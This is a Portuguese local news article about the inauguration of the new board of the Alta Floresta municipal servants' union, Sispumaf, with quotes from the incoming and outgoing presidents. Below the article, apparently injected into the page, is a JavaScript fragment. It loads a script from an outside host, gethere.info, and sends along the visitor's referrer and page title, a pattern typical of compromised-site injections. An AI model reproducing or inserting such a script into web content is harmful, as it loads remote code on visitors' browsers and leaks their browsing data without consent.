Capa / Cidades / Diretoria do Sispumaf toma posse em cerimônia simples

Diretoria do Sispumaf toma posse em cerimônia simples

Da Redação

Em uma cerimônia simples a nova diretoria do Sindicato dos Servidores Públicos Municipais de Alta Floresta – Sispumaf, foi empossada na manhã de quinta-feira, 28 na sede do sindicato.
Eder Vilasante recebeu a chave da instituição das mãos do ex-presidente Sady de Moura. A nova diretoria eleita para a gestão 2016/2018, foi eleita em 27 e novembro de 2015 e recebeu 91 dos 205 votos.
Eder já está no comando do sindicato desde o dia primeiro do ano, porém a posse ocorreu ontem devido as férias dos servidores. Segundo o presidente algumas ações já vêm sendo tomadas, como a negociação da reposição salarial e o planejamento para a realização de cursos para aumentar a carga horária dos certificados. “Vamos dá continuidade no que já vem sendo feito e ampliar as coisas que não vinham acontecendo, a visão dessa diretoria é diferenciada um pouco das outras a gente quer realmente atuar como sindicato, cobrando mais a participação do município na vida do servidor”, pontuou Vilasante.
O ex-presidente, Sady de Moura ao longo dos anos adquiriu muita experiência, assim como a atual presidente, que já entra com essa “bagagem”. “Quando entrei no sindicato eu não tinha experiência nenhuma como sindicalista e agora a gente só comemora as vitórias, foram 12 anos de muita luta e muito estudo, porque para ser sindicalista não é fácil e você tem que está antenado a todos os direitos dos trabalhadores em geral”, destacou.
Umas das promessas de campanha que foram concretizadas e comemoradas pelo ex-presidente ao longo de seu mandato, foram à regularização dos terrenos dos servidores públicos e, outra conquista foi à área de lazer que foi oficialmente doada para a categoria no final do ano passado, este será o primeiro ano que a classe comemorará a festa do servidor público em sede própria.

KODAK Digital Still Cameras.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre Kariny Santos

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top